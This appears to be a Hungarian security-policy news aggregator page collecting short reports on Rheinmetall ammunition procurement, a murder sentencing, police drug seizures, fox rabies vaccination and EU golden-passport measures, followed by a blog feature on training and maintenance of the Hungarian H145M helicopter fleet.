You are here

Biztonságpolitika

Maróth: lőszereket vesz a Rheinmetall cégcsoporttól a honvédség

Biztonságpiac - Thu, 03/31/2022 - 05:35
Hadilőszerek széles választékát szerzi be a Magyar Honvédség a Rheinmetall cégcsoporttól – jelentette be Maróth Gáspár védelmi fejlesztésekért felelős kormánybiztos.

A kormánybiztos közleménye szerint a szerződés teljesítése 2023-ban kezdődik, 2031-ig tart, és kulcszerepet játszik benne a német hadiipari vállalat többségi tulajdonában lévő, Várpalotán létesülő lőszergyár.

Az együttműködés részeként közepes kaliberű, harminc milliméteres lőszerek választéka érkezik a Rheinmetall zalaegerszegi üzemében 2023-tól előállítandó Lynx gyalogsági harcjárművek számára, 120 milliméteres lőszerek a Leopard 2 harckocsikhoz, valamint 155 milliméteres tüzérségi lövedékek, hajítótöltetek és gyújtók a PzH 2000 önjáró lövegekbe. A megrendelés részét képezik a 40 milliméteres Rosy és a 76 milliméteres Maske ködgránátvetők töltetei, valamint 12,7 és 7,62 milliméteres, kis kaliberű lőszerek is – ismertették.

A közlemény szerint Maróth a szerződés aláírásakor azt mondta: “a beszerzési program lehetővé teszi, hogy a honvédség és a kibontakozó hazai védelmi ipar együttes erővel, hitelesen szavatolhassa Magyarország és a magyar emberek biztonságát és békéjét. Hosszú távon biztosítja a rendszeresítésre kerülő korszerű harcjárművek fegyverzetének ellátását”. Szem előtt tartja továbbá a védelmi iparfejlesztés, a hazai hadianyaggyártás újjáélesztésének szempontjait is – jegyezte meg.

Rövidesen a Rheinmetallal közösen létrehozandó várpalotai lőszergyár is bekapcsolódik a megrendelés teljesítésébe, a termékek túlnyomó részét ott gyártják majd – mondta a kormánybiztos, aki egyúttal kiemelte: “a megfelelő lőszerkészlet és honi lőszergyártó képesség az erős honvédelem alappillére”.

Armin Papperger, a Rheinmetall cégcsoport vezérigazgatója a beszerzést kommentálva nagy megtiszteltetésnek nevezte, hogy Magyarország ismételten cégcsoportjukat bízta meg haderőfejlesztése egy újabb fontos részletével. “Örömünkre szolgál, hogy egy újabb területen működhetünk együtt magyar barátainkkal” – fogalmazott a közlemény szerint a német hadiipari vállalat vezérigazgatója.

The post Maróth: lőszereket vesz a Rheinmetall cégcsoporttól a honvédség appeared first on .

Categories: Biztonságpolitika

Huszonnégy év fegyházat kapott az a polgári férfi, aki koncerten ölte meg haragosát

Biztonságpiac - Wed, 03/30/2022 - 16:35
Huszonnégy év fegyházbüntetésre ítélte a Debreceni Törvényszék azt a férfit, aki a közösségi oldalán megüzente a sértettnek, hogy megöli őt, majd nem sokkal később egy Polgáron megtartott rendezvényen be is váltotta a fenyegetését – közölte a bíróság szóvivője.

Dobó Dénes jelezte: a törvényszék O. Sz.-t – egyebek mellett – emberölés és kerítés bűntettében találta bűnösnek. Az ítélet szerint a vádlott nem bocsátható feltételes szabadságra.

A tényállás szerint a polgári férfi és élettársa – anyagi gondok miatt – 2017 szeptemberében úgy döntött, hogy a nő szexuális szolgáltatást fog nyújtani férfiaknak. A partnereket a nő egy közösségi oldalon hirdetésekkel kereste, illetve a vádlott szerezte. Többször a férfi mondta meg a nőnek, hogy kihez, hova kell mennie, de volt olyan is, hogy személyesen vitte el. A kapott pénz egy részét a nőnek át kellett adnia a vádlottnak – ha ezt megtagadta, a férfi megverte őt.

O. Sz. egy gyerekkori ismerősének is ajánlotta a nőt 2019 márciusában. Kétszer össze is hozta a találkozót, amelyen a nő és kuncsaftja között szimpátia alakult ki. A férfi megsajnálta a nőt, majd – kihasználva, hogy a vádlott 2019 májusában Budapestre ment dolgozni – a gyermekével együtt magához költöztette. O. Sz. emiatt mindkettőjüket megfenyegette, és azt hangoztatta, hogy a férfit megöli; a közösségi oldalára is kiírta: “augusztus 18-án meghalsz”.

Polgár főterén augusztus 19-én este rendezték meg az újkenyér ünnepét, amelyen ott volt mindkét megfenyegetett; a férfi annak ellenére, hogy a fia figyelmeztette a vádlott fenyegető üzenetei miatt. A vádlott is a rendezvényre tartott, amit élő videón közvetített a közösségi oldalán, végig azt hangoztatva, hogy meg fogja ölni a férfit.

A rendezvény helyszínén O. Sz. észrevétlenül, hátulról megközelítette haragosát, hirtelen a hátára ugrott, és emiatt mindketten a földre estek. Dulakodás közben O. Sz. a sértettet késsel megszúrta a hátán, derék- és nyaktájékon. A további bántalmazást a rendezvényt biztosító rendőrök akadályozták meg, akik a vádlottat a helyszínen elfogták. O. Sz. véréből és vizeletéből a szakértő új pszichoaktív anyagot és más kábítószert is kimutatott.

A sértett kórházba szállítás közben meghalt. A törvényszék ítélete ellen az ügyészség súlyosításért, a vádlott és védője enyhítésért fellebbezett – közölte a szóvivő.

The post Huszonnégy év fegyházat kapott az a polgári férfi, aki koncerten ölte meg haragosát appeared first on .

Categories: Biztonságpolitika

ORFK: drogfogási rekordokat döntött meg a rendőrség

Biztonságpiac - Wed, 03/30/2022 - 12:10
Jelentősen nőtt a magyarországi kábítószer-kínálat, de a rendőrség sikeresen vette fel a kábítószer-kereskedelem elleni harcot és drogfogási rekordok dőltek meg – közölték az Országos Rendőr-főkapitányság (ORFK).

Csákó Ibolya, az ORFK bűnügyi főosztályának kiemelt főreferense úgy összegezte: XXI. századi módszerek jelentek meg a bűnözésben, de a bűnüldözésben is. Példaként említette, hogy a koronavírus rászoktatta az embereket az online vásárlásra, de az online kereskedelem az illegális térben is virágzik. Ezért a rendőrség is nagy hangsúlyt fektet a kábítószerek, az új pszichoaktív anyagok és a hamis gyógyszerek online kereskedelmének felderítésére.

Az alezredes kiemelte: tavaly az év első két hónapjában a lefoglalt kábítószerek nyolc százaléka származott a nemzetközi postaforgalomból, idén már húsz százalék ez az arány. Kitért az úgynevezett ANOM-ügyre is; ez egy titkosított, az FBI által tervezett platformot takar, amelyről azt terjesztették, hogy a rendőrök biztosan nem férnek hozzá. Valójában azonban az FBI és az Europol együttműködésében egy magyar bűnszervezetet is sikerült leleplezniük.

Csákó felidézte: tavaly nyáron 11 embert fogtak el, majd a júniusi elfogások után júliusban is elfogtak három embert, akiktől ötven kilogramm marihuánát, négy kilogramm kokaint és negyven liter amfetaminolajat foglaltak le. Az ügyhöz kapcsolódóan idén februárban is elfogtak két embert, akiktől 36 millió forintot, nagy értékű órákat, ékszereket, valamint háromezer ecstasy tablettát foglaltak le.

Szintén az ügyhöz kapcsolódóan fogtak el egy férfit, aki az internetről rendelt hétezer ecstasy tablettát és négy kilogramm amfetamint. Akkor mentek érte a rendőrök, amikor épp újabb 15 ezer tablettát rendelt az internetről – folytatta az alezredes, aki hihetetlennek nevezte ezt a kábítószer-mennyiséget és úgy fogalmazott: ők is megdöbbentek, hogy milyen nagy mennyiségű kábítószer van Magyarországon. A lefoglalással százmillió forint értékű drog utcára kerülését akadályozta meg a rendőrség – tette hozzá.

Egy másik ügyről szólva azt mondta: egy Bács-Kiskun megyei településen egy kétszintes, 180 négyzetméteres könnyűszerkezetes csarnoképületben egy olyan fejlett infrastruktúrát találtak, amely termesztőtálcákban 1300 kannabisz termesztésére volt alkalmas egyidejűleg. A csarnok távvezérelhető infralámpával, hőmérséklet- és páramérő eszközökkel volt felszerelve, amelyek egy internetes felhőbe konfigurált fiókba közvetítették az adatokat, vagyis a termesztők a távolból is látták azokat. Ezeket az eszközöket külföldről vásárolták – mondta az alezredes, hozzátéve: nem csak kannabiszt, hanem hat kilogramm kokaint is lefoglaltak a helyszínen. Ebben az ügyben két bűnszervezet ellen folyik eljárás és öt ember ellen adtak ki körözést.

Csákó arról is beszélt, hogy több esetben “családi biznisz” a kábítószer-kereskedelem. Példaként említette azt az apát és fiát, akik azzal váltak gyanússá egy borsodi településen, hogy hirtelen meggazdagodtak. A rendőrségnek a terjesztőjüket is sikerült elfognia, az ügyben pedig több mint 100 kilogramm új pszichoaktív anyag utcára kerülését akadályozták meg. A félmillió adagnak megfelelő kábítószer mennyiségének érzékeltetésére az alezredes azt mondta: az elmúlt öt évben nem foglaltak le ennyi új pszichoaktív anyagot összesen.

Egy másik ügyben Nógrád megyében egy 52 éves apa és 19 éves fia bukott le, tőlük 44 kilogramm kannabiszt, nyolc kilogramm kokaint és 2,8 kilogramm ketamint foglaltak le. Utóbbi azért érdekes, mert Magyarországon nem jellemző ez a fajta drog, és Magyarországon ilyen nagy mennyiséget egy eljárásban még sosem foglaltak le a rendőrök – mondta. A kokain mennyiségét érzékeltetve közölte: tavaly 13 kilogramm kokaint foglaltak le az év során.

Korosodnak a kábítószer-kereskedelem elkövetői – folytatta az alezredes, példaként említve, hogy idén Budapest XIII. kerületében egy 61 éves nő, míg Salgótarjánban egy 68 éves férfi ellen indítottak eljárást. Évente egy-két olyan eset van, amikor emberek a testüregükben próbálnak Magyarországra kábítószert csempészni, idén már volt egy ilyen elfogás: februárban egy nigériai férfi próbált Belgiumból Budapestre csempészni harminc kokain kapszulát a gyomrában – mondta.

Oláh-Paulon László, az ORFK bűnmegelőzési osztályának vezetője arról beszélt, hogy a több száz kilogramm a lefoglalt kábítószer mennyisége, a sikeres elfogások mind arra mutatnak, hogy több tízezren lehetnek veszélyben. Ezért különösen fontos a megelőzés és az, hogy a kínálati oldal visszaszorítása mellett a keresleti oldalon is eredményeket érjenek el.

Hozzátette: mindent megtesznek azért, hogy felhívják a figyelmet az internetes bűncselekményekre, emellett a középiskolásokat célzó iskolai bűnmegelőzési tanácsadó hálózaton keresztül 89 kollégája 92 település 214 iskolájában százezer diákot ér el.

Az Európai Bizottság újabb két pszichoaktív anyag betiltását kezdeményezte
A kábítószer elleni küzdelem jegyében az Európai Bizottság újabb két pszichoaktív anyag, a 3-MMC-t és a 3-CMC kódjelű szerek uniós betiltását kezdeményezte. Az uniós bizottság tájékoztatása szerint a két kábítószer betiltására vonatkozó döntés a Kábítószer és a Kábítószer-függőség Európai Megfigyelőközpontja (EMCDDA) által végzett kockázat-értékelésen alapul, amely szerint mindkét anyag mérgező hatásuk miatt életveszélyes. Az Európai Unióban 2012, illetve 2014 óta elérhető két anyagot elsősorban por formájában árulják, de kapható tablettában és kapszulában is. Öt uniós tagállamban a 3-MMC-vel összefüggésben 27 halálesetről számoltak be, két tagállamban pedig 10 halálesetről számoltak be a 3-CMC esetében. Az uniós bizottság javaslata két hónapon belül hatályba lép, ha az Európai Parlament és az Európai Unió Tanácsa nem emel kifogást ellene. Hatályba lépését követően, az uniós tagállamoknak hat hónap áll rendelkezésükre, hogy a tilalmat nemzeti jogrendjükbe iktassák – közölték.

The post ORFK: drogfogási rekordokat döntött meg a rendőrség appeared first on .

Categories: Biztonságpolitika

Nébih: hamarosan kezdődik a tavaszi rókavakcinázás

Biztonságpiac - Wed, 03/30/2022 - 08:35
A rókák veszettség elleni vakcinázására az idén tavasszal is sor kerül, az érintett térségekben ebzárlat és legeltetési tilalom lép életbe – közölte a Nemzeti Élelmiszerlánc-biztonsági Hivatal (Nébih).

A repülőgépes vakcinázás 2022. március 26-án kezdődik Magyarország déli és keleti megyéiben. Az ebzárlat és a legeltetési tilalom elrendeléséről, valamint az egyes területekre vonatkozó pontos időpontokról az illetékes járási állategészségügyi hivatal, illetve a települési önkormányzat tájékoztatja a lakosságot.

Részletezték, hogy az immunizálás során a vakcina tartalmú csalétkeket kisrepülőgépekről juttatják ki a területre, ez a lakott, sűrűn beépített övezeteket nem érinti. A külterületeken plakátok figyelmeztetik majd a kirándulókat. A programba bevont területek tájékoztató jellegű térképe, valamint az érintett települések megyei bontású listája a Nébih weboldalán is elérhető.

Ismertették, hogy a veszettség fő terjesztője a vörös róka, amelynek hazai állománya mintegy hetvenötezer egyedre becsülhető. A veszettség a vadon élő és a házi emlősállatokra, valamint az emberre egyaránt veszélyt jelent, ezért a kutyák veszettség elleni védőoltása kötelező, a macskáknak pedig ajánlott.

Rámutattak arra, hogy az immunizálási program eredményességét a kilőtt rókák laboratóriumi vizsgálatával ellenőrzi a Nébih. Az előző évek eredményei alapján a vakcinázott területen a rókák mintegy háromnegyede felvette a vakcinát tartalmazó csalétket. A program sikerét bizonyítja, hogy a betegség az elmúlt években már csak elvétve fordult elő Magyarországon, utoljára 2017-ben, Borsod-Abaúj-Zemplén megyében mutatták ki a vírust. Emberi megbetegedés pedig már több mint huszonöt éve nem történt. A kedvező járványügyi helyzetnek megfelelően a vakcinázandó területet is csökkenteni lehetett.

A Magyarországgal szomszédos országok közül Romániában és Ukrajnában még előfordul a veszettség. A román hatóság utoljára 2021 februárjában jelentette a betegség megállapítását rókában, magyar határhoz közeli Szatmár megyében. Ukrajnában 2021-ben mintegy 400 esetben mutatták ki a veszettség vírusát házi- és vadállatokban. A vakcinázási program egyúttal hozzájárul ahhoz is, hogy meg lehessen őrizni Magyarország veszettségtől mentes státuszát, amit 2021 tavaszán az Európai Unió, majd idén februárban a Nemzetközi Állatjárványügyi Hivatal (OIE) is elismert – közölte a Nemzeti Élelmiszerlánc-biztonsági Hivatal.

The post Nébih: hamarosan kezdődik a tavaszi rókavakcinázás appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Az EU az állampolgársági és vízumprogramok megszüntetésére szólít fel

Biztonságpiac - Wed, 03/30/2022 - 07:33
Az Európai Bizottság a befektetői állampolgársági, úgynevezett aranyútlevél-, illetve aranyvízum-programok megszüntetésére szólította fel a tagállamokat, valamint az orosz és fehérorosz állampolgárok uniós állampolgárságának felülvizsgálatát, illetve az orosz és fehérorosz állampolgároknak uniós beutazást biztosító vízumok visszavonását javasolta – tájékoztatott a brüsszeli testület.

Ajánlásában az uniós bizottság kijelentette: “nagyon fontos, hogy minden tagállam, mely még mindig működtet befektetői állampolgársági programot, ezt azonnal megszüntesse. Ezek a rendszerek nem egyeztethetők össze a lojális együttműködés elvével és az uniós polgárság EU-szerződésekben rögzített fogalmával” – fogalmaztak.

Hangsúlyozták: a befektetői letelepedési programok biztonsági, pénzmosási, adókijátszási és korrupciós kockázatokat jelentenek a tagállamok és az EU egésze számára. Oroszország Ukrajna elleni agressziója ismét rávilágított e kockázatokra – közölték.

Az Európai Bizottság arra kérte a tagállamokat, hogy vezessenek be és végezzenek szigorú ellenőrzéseket, mielőtt befektetői letelepedési program keretében bármilyen tartózkodási engedélyt kiadnának. Felszólította a tagállamokat: haladéktalanul vonják vissza a befektetői letelepedési program keretében az ukrajnai háború miatt uniós szankciók hatálya alatt álló orosz vagy fehérorosz állampolgárok számára kiadott tartózkodási engedélyeket, vagy tagadják meg a meghosszabbításukat. Ugyanígy járjanak el azok esetében is, akik számottevően támogatják az Ukrajna elleni háborút, illetve az orosz, vagy a fehérorosz kormány nemzetközi jogot sértő egyéb, ezzel összefüggő tevékenységeit.

A bizottság arra szólított fel, hogy a tagállamok minden orosz és fehérorosz állampolgár esetében függesszék fel tartózkodási engedélyek kiadását a befektetői letelepedési programok keretében.

Az intézkedések alkalmazásának összhangban kell állnia az arányosság elvével, az alapvető jogokkal és a tagállamok nemzeti jogszabályaival – írták. Az uniós bizottság továbbá arra kérte fel a tagállamokat, hogy május végéig tegyenek jelentést az előterjesztett ajánlás végrehajtásáról, és ezt követően rendszeresen adjanak róla tájékoztatást.

The post Orosz agresszió: Az EU az állampolgársági és vízumprogramok megszüntetésére szólít fel appeared first on .

Categories: Biztonságpolitika

FEJLŐDÉS, HOSSZÚTÁVÚ CÉLLAL

Air Base Blog - Wed, 03/30/2022 - 07:14

A koronavírus-járvánnyal nehezített 2020-as év után 2021-ben is folytatódott a H145M helikopterrel való ismerkedés, a hajózók és a repülőműszakiak átképzése. A tervek részben megvalósultak, de a java még hátravan. Ahhoz, hogy betekinthessünk a típus üzemeltetésének elmúlt egy évébe, február elején Dajka Attila őrnagytól, oktató-helikoptervezetőtől és a repülőműszaki zászlóalj H145M üzemeltetésért felelős parancsnokától, Bagi Tamás őrnagytól kaptunk segítséget.

Közismert, hogy tavaly év végén teljessé vált a Magyar Honvédség H145M flottája. A húsz helikopter leszállításkori konfigurációja tíz szállító (LUH), öt kutató-mentő (SAR) és öt tűztámogató (MP) változat volt. Bár az utolsó két gép csak decemberben érkezett, 2021 márciusától már tizennyolc géppel folyhatott a munka. A tavalyelőtti, hétfőtől csütörtökig tartó repülési napok 2021-ben gyakran kitolódtak szombatig, elsősorban az oktatás miatt. Ennek is köszönhető, hogy a program beindulása óta, a németországi képzést is beleértve, a H145M-mel összesen 6800 órát repültek a magyar helikoptervezetők. Jelenleg a két elsőként átképzett pilóta az, aki kizárólag a 145-ösön repül. Nem is keveset, hiszen például Dajka Attila őrnagy 2021-ben 418 órát jegyezhetett be a repülési naplójába. (Nem is olyan régen az utolsó két számjegy jelentette egy magyar katonai helikoptervezető éves repült idejét.) Mindenki más, aki szállító és harci helikopterről érkezett a 145-ösre, repült ideje nagy részét az új helikopteren tölti, de csökkentett óraszámban, bizonyos korlátozással továbbra is repüli azt a típust, amit korábban. Például egy gépparancsnok csak másodpilóta feladatokat lát el, vagy aki oktató volt, megmaradt gépparancsnoknak, de már nem oktat. A régi és új helikoptereket egyaránt repülő pilóták az adott napon csak egy típussal repülnek, és mielőtt valaki visszaül az orosz gépre, előtte szimulátoroznia kell.

A kiképzettségnek és a korábban megszerzett tapasztalatnak köszönhetően a 6800 repült órában nem volt gépsérülés, de még egy karcolás sem. Madárral ütköztek már, de ez földközelben előfordul. Új és sajnos nehezítő eleme a földközeli kiképzésnek, hogy a honvédség helikopterpilótái a saját ellenőrzött légtéren kívül nem repülhetnek 500 láb (150 méter) alatt, mert bárhol, bárki reptethet drónt. Márpedig egy katonai helikopter alkalmazásának éppen ez lenne a lényege. Természetesen vannak szabálykövető drónpilóták, akik légteret igényelnek, bejelentik a repülést, a tájékoztató szolgálat pedig megadja a helikoptervezetőnek, hogy hol és milyen kiterjedésű légtérben üzemel drón. A hajózók az adatokat betáplálják a helikopter navigációs rendszerébe, ami kirajzolja a térképre azt a kört, amit kerülni kell. Ez így jól működik, a probléma a be nem jelentett drónozással van.

A műszakiaknál fontos előrelépés, hogy immár az EASA (Európai Repülésbiztonsági Ügynökség) által elismert önálló karbantartó szervezetként dolgoznak. A hajózókéhoz hasonló, típusok közötti átjárás náluk továbbra sincs. A húszgépesre duzzadt flottánál sok a feladat, több a hibalehetőség, fejben is ott kell lenni, ezért aki elkezdte a munkát a H145M-en, az már nem megy vissza az orosz típusokra. Mivel azonban a Mi-17-eseket és Mi-24-eseket is üzemeltetni és karbantartani kell, az eddig átképzett 90 fős létszámnak nagyjából csak a fele dolgozik az új helikoptereken. A legtöbbet repült gépnél márciusban jön el a H145M legmagasabb ellenőrzési formája, a 800 órás (vagy 3 éves) karbantartás. Két német szakember érkezik Szolnokra, akik a B1-es (sárkány-hajtómű) és a B2-es (avionika) képzést adják azoknak a műszakiaknak, akik ezeket még nem kapták meg. A komoly megbontással, hajtómű leépítéssel, és a Fenestron-lapátok kiszerelésével járó 800 órás karbantartás bő két hónapot vesz majd igénybe. Ezt a munkát most még a németekkel közösen végzik a magyar műszakiak, a későbbiekben már önállóan, a helikopterbázison. Az ellenőrző berendezésekből kell még pótlás, egyébként az eszközök adottak egy ilyen szintű karbantartáshoz.

Szolnokon egyelőre sokkal szerényebbek a körülmények, mint például az Airbus gyárban, ahol minden berendezésnek, fődarabnak külön műhelye van. A gyártó figyelembe veszi a helyi viszonyokat, amikor kiadja az engedélyt az adott munkára. Például van a gépen egy porszűrő, amit mosni kell. A németeknek van mosóhelyisége, Szolnokon nincs, ezért az akkumulátortöltő állomásra viszik a szűrőt, kimossák, 24 órán át szárítják, impregnálószerrel bevonják, és ismét szárítják. Minden ilyen folyamatot leegyeztetnek a gyártóval, hogy végre is lehessen hajtani és a szabályzóknak is megfeleljen. A leendő hangárkomplexumban a speciális műhelyek is tervezve vannak, de amíg nem épül fel, addig egyeztetni kell, hogy egy adott berendezés ellenőrzését elvégezhetik egy asztal mellett vagy por- és páramentes helyiségben kell végrehajtani. A hangárkomplexum tervezésénél megkérdezték a műszakaikat is, hiszen az új technika sokkal műhelyigényesebb, a régi helikopterek akár az állóhelyen is javíthatóak voltak.

Az általános tapasztalat továbbra is az, hogy a párásodásra érzékeny a gép. Ha a számítógép hibaüzenetet ad, a műszakiak elvégzik a működési teszteket, és ha a hiba továbbra is fennáll, megteszik a szükséges beavatkozásokat. Jó tapasztalatszerzési lehetőség volt, amikor egy gyakorlat keretében, tizenöt H145M a szabad ég alatt töltötte az éjszakát. Gyári és EASA előírások szabályozzák, hogy hogyan kell a 145-ösöket tárolni, de ezek betartását a katonai követelmények nem mindig teszik lehetővé. A szabadban történő tároláskor nagyon kicsi a H145M szélkorlátozása. Harmincöt csomó (63 km/h) szélsebesség felett nem csak a forgószárny-lapátokat kell nyűgözni a géphez, hanem a talpat is a talajhoz. Ha ez elmarad, akkor a betakart Fenestron egy nagy vitorlaként működik és a helikopter ugyan nem borul fel, de a szél beforgathatja, ami a gép sérülésével járhat. Ezért fontos, hogy legyen nyűgöző készlet a talpakhoz. Az Airbus ezzel kapcsolatban csak ajánlásokat ad ki, a döntés az üzemeltetőé – ahogyan a számla is, ha gépsérülésből eredő javítás válik szükségessé.

*

A pilóták átjárását a H145M és a Mi-17-es között elsősorban az indokolja, hogy a kutató-mentő szolgálatot fenn kell tartani és ez a feladat ma még az orosz típusra hárul. A gépek, a felszerelés és a személyzet adott, már csak elöljárói döntés és feladatszabás kérdése, hogy a H145M-ek is becsatlakozzanak a kutató-mentő szolgálat ellátásába. A típus légiüzemeltetési utasítása megengedi, hogy egy pilóta repülje a helikoptert, ami a súlymegtakarítás miatt a kutató-mentő műveletnél nagyon jól jön, hiszen a másodpilóta ülését a fedélzeti rendszerkezelő foglalhatja el. Számukra egy külön szakszolgálati engedély kategóriát hoztak létre, képzésük jól halad. A tapasztaltabb fedélzeti technikusok közül kikerülő rendszerkezelők először csörlőkezelő kiképzést kaptak Donauwörthben, a további képzésekre már itthon került sor. A kutató-mentő feladatnál a pilóta a helikopter vezetésére koncentrálhat, a navigációs és kommunikációs rendszerekkel a fedélzeti rendszerkezelők foglalkoznak. Ha a mentési eljárás csörlést igényel, akkor a rendszerkezelő kiszáll a bal ülésből, hátramegy és elvégzi a csörlést, majd visszaül a helyére. Ha erre egy külön csörlőkezelő lenne, akkor kevesebb üzemanyagot lehetne tölteni a helikopterbe. Ez egyébként is keskeny mezsgye, mert egy teljes kutató-mentő konfigurációjú gépet - felszerelés, egy fő egészségügyi személyzet, egy fő kutató-mentő személyzet (ejtőernyős), a fedélzeti rendszerkezelő és a pilóta – nem lehet teljesen feltölteni és már akkor is maximális felszálló súlyon van. Ebben a feladatkörben érdekes példa Németország, ahol a katonai kutató-mentő szolgálat kiegészíti a polgári légimentést. Ha az adott körzetben nincsen gép vagy éjszakai mentésnél nincs éjjellátóval (NVG) felszerelt mentőhelikopter, akkor a katonákat riasztják.

Ha a kutató-mentő szolgálatban még nem is, de a határszakasz ellenőrzésénél már jelen vannak a H145M-ek. Előrelépés, hogy a korábbi vizuális módszer mellett a gép orra alá szerelt MX-15D szenzortorony elektrooptikai rendszerét is használják a rendszerkezelők. A feladatot a határra vezényelt felderítő katonákkal együttműködve repülik, akik szintén a fedélzeten tartózkodnak, ismerik a gócpontokat, tudják, hogy hova kell repülni, és megvan a kapcsolatuk a földi erőkkel. Ez az együttműködés az utóbbi időben több elfogáshoz segítette hozzá az összevont katonai és rendőri egységeket. A szenzor nagy segítség, kameraképe kitűnő, a határszakaszon elfogott határsértők esetében is jól látszott az éjszakai felvételeken, ahogy létrát támasztanak a kerítéshez és dobálják a rendőröket.

A H145M alkalmazásánál alapvetés az éjjellátó szemüveggel végrehajtott éjszakai bevethetőség. Az NVG képzés megkezdéséhez a pilótáknak el kell érni egy bizonyos kiképzettségi szintet a szemüveg használata nélkül, azért, hogy ha az NVG meghibásodik, akkor nélküle is végre tudják hajtani az éjszakai leszállást. (Az éjjellátó szemüvegek garanciálisak, ha gond lenne velük, az Airbus intézkedik a javításról vagy a cseréről.) Aki erre a kiképzettségi szintre elért, a normál éjszakai kiképzést végrehajtotta, és a kecskeméti repülőorvosok is rábólintanak, hogy a szeme alkalmas – még nem volt olyan, hogy ne lett volna az – az megkezdheti az NVG-képzést. A tanfolyam elméleti része a szem anatómiájától a szemüveg működésének részletesen ismertetésén át az NVG-s repülés elméletéig tart. Ez után jön a gyakorlati repülés az éjjellátó szemüveggel. A kiképzettséghez 30-50 óra NVG-s repülés a minimum, attól függően, hogy más típuson éjjellátóval már tapasztalatot szerzett pilótáról vagy e téren teljesen kezdőről beszélünk. Hozzá kell szokni, hogy szűk a látótér és monokróm a kép, ahol a mélységélességet nehéz megbecsülni. Nem könnyű a dolog és nagyon szoros együttműködést kíván meg a személyzettől, hiszen az NVG használat lényege egy szállító helikopteren az, hogy a személyzet éjszaka is le tudjon szállni egy ismeretlen, előkészítetlen terepen, például egy kutató-mentő helikopter esetében az éjszakai kárhelyszínen. Ezt a közepes szállító helikoptereken is gyakorolták, de ott öt éjjellátós ember osztotta meg a feladatot. Miközben szűk területre szálltak le és elöl a fülkében három ember dolgozott, a tehertérből két, szkennernek nevezett fedélzeti technikus figyelte, hogy a helikopter befér-e az adott területre és, hogy a faroktartó és a faroklégcsavar ne érjen semmilyen akadályhoz. A 145-ösökből két szempár figyel kifelé a terepen végrehajtott éjszakai leszállásoknál.

*

A helikopter fegyverrendszerére a hajózók több turnusban, itthon kaptak képzést a német oktatópilótáktól. Pár nap sűrű elmélet után, a hangsúly a repülésre helyeződött át, majd a képzés utolsó szakaszában már csak repültek a pilóták, akik közül az NVG jogosítással rendelkezők éjjellátó szemüveggel is alkalmazták a fegyverrendszert. Nem egyforma a pilóta képzése, aki a fegyver alkalmazása közben vezeti a helikoptert és a lövészé, aki a rendszert kezeli - a német oktató a baloldalon ült, amikor pilótát oktatott, és a jobb oldalon, amikor lövészt. Azóta már van a fegyverrendszer oktatására jogosított magyar helikoptervezető is. Az Airbus képez olyan lövészeket is, akik sosem repültek pilótaként, csak a fegyverrendszert kezelik, ami bonyolultabb feladat a helikopter vezetésénél. Nálunk a lövészeket egyelőre a pilóták közül választották ki, de ez csak az első lépés, a fedélzeti rendszerkezelők közül is képeznek majd lövészt.

A gépágyúlőszer a német oktatók távozása után érkezett meg. Így történt, hogy az első éleslövészetet teljesen magyar személyzet hajtotta végre 2021 szeptemberében Táborfalván. Minden úgy ment, mint a kiképzés során, de természetesen más az, amikor élesben szól a fegyver, és nem csak a számláló jelzi a lövést. Az ugyancsak szeptemberi Breakthrough 2021 gyakorlat éleslövészetei során a pilóták megtapasztalták, hogy a gép kis tömege és a nagyméretű Fenestron-ház miatt az oldalszél jelentősen befolyásolhatja a gépre függesztett 20 milliméteres, Nexter NC621-es gépágyú találati pontosságát. A lőtéri szabályok miatt a helikopter csak egy adott szektoron belül repülhet be. Oldalszélben szélrátartással repülnek, a gép orra a repülés irányától eltérő irányra mutat, de a célzáshoz rá kell tenni a célra, ekkor viszont az oldalszél elkezdi tolni a helikoptert. A gép valamennyit kompenzál, de a pilóta dolga a célon tartani a 145-öst. A már kiképzett hajózóknak bizonyos időnként a lőniük kell, azzal a könnyítéssel, hogy fotólövészetet is elfogadnak a jártasság fenntartásra. Ez régen valóban filmre ment, amiből fotó készült a célkereszttel. A H145M-en videó felvétel készül, kommunikációval, célkiválasztással, fegyverkiválasztással, célzással, így mindent figyelembe véve lehet megállapítani, hogy az illető alkalmas-e az éles fegyver alkalmazására.

A műszakiak esetében az volt az elgondolás, hogy amikor megjönnek a tűztámogató gépek, akkor áll fel a fegyveres csoport, de ez a koronavírus-járvány miatt csúszott, így a HForce képzésre tavaly nyáron került sor. Szintén csúszott - tavalyról idén tavaszra - a fegyverrendszer-harmonizációs tanfolyam. Ezt a folyamatot az orosz helikoptereken fegyverbelövésnek nevezték. A H145M esetében a fegyvert és az elektrooptikai rendszert kell szoftveresen összehangolni (harmonizálni). Ezért van az új fogalom, mert nem csak belövés van, hanem harmonizálni is kell. A honvédség helikopterei belőve érkeztek, de az időszakos karbantartások után harmonizálni kell a gépeket, amire a tanfolyam után a szolnoki fegyveresek is készen állnak majd.

A napi feladatok mellett további képességek kialakítása is folyamatban van. Az egyik az ajtólövész alkalmazása, amelynek kialakítását az a tapasztalat segíti, amit itthon és Afganisztánban szereztek a szolnokiak. Ugyancsak minden adott a gyorsköteles (fast rope) képzéshez, amely februártól indult. A külső súlyos képzést a pilóták és a műszakiak is megkapták, de a különleges műveleti katonák által használt SPIES-köteles módszert még ki kell dolgozni. A külső súly esetében elvileg 1600 kg lenne a terhelhetőség, de ez esetben minimális üzemanyagot lehet tankolni. Új elemként, tavaly áprilisban volt egy repülőműszaki gyakorlat, amikor Pápán az Airbus szakembereivel közösen egy C-17-esbe rakodtak be három 145-öst, amelyeket a leszállást követően 1,5 – 3 óra alatt lehet repülőképessé tenni. A C-17-eshez a forgószárny-lapátok leszerelése is elég volt, de már a KC-390-esre is elkezdődött a tervezés. Ott a tehertér kisebb méretei miatt több megbontásra lesz szükség.

*

